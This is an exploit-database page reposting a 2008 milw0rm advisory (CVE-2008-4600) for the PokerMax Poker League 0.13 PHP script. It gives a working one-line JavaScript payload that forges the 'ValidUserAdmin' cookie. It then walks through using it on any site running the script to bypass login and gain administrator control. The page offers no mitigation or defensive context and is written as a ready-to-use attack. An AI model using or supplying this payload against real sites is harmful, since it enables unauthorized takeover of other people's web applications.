[] NeoSense
E X P L O I T S
title author type platform port cve id

PokerMax Poker League 0.13 - Insecure Cookie Handling

Author: DaRkLiFe
type: webapps
platform: php
port: 
date_added: 2008-10-15 
date_updated: 2016-12-29 
verified: 1 
codes: OSVDB-49153;CVE-2008-4600 
tags: 
aliases:  
screenshot_url:  
application_url: 
**************************************************************************************

Author : DaRkLiFe
Greetz : str0ke & S.W.A.T. & funkys0ul

**************************************************************************************
Script   :

PokerMax Poker League Insecure Cookie Handling Vulnerability

Download:

http://www.stevedawson.com/downloads/pokerleague.zip
**************************************************************************************

Exploit :

javascript:document.cookie = "ValidUserAdmin=admin";

**here "admin" refers to username of administrator on site

default username is "admin" given after installation of site

but if it is changed u can easily find out username of admin and then
substitute it in place of "admin"
**************************************************************************************

Instructions :

Find the site running on this script .

Go to http://site.com/pokerleague/pokeradmin/configure.php

It will ask for login. Now in url tab run the exploit command

Then return back to http://site.com/pokerleague/pokeradmin/configure.php

Now u should be loggedin as admin and change the thing into what you want .

**************************************************************************************

THANKS ! GREETZ ! HAPPY DIWALI !
**************************************************************************************

# milw0rm.com [2008-10-16]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.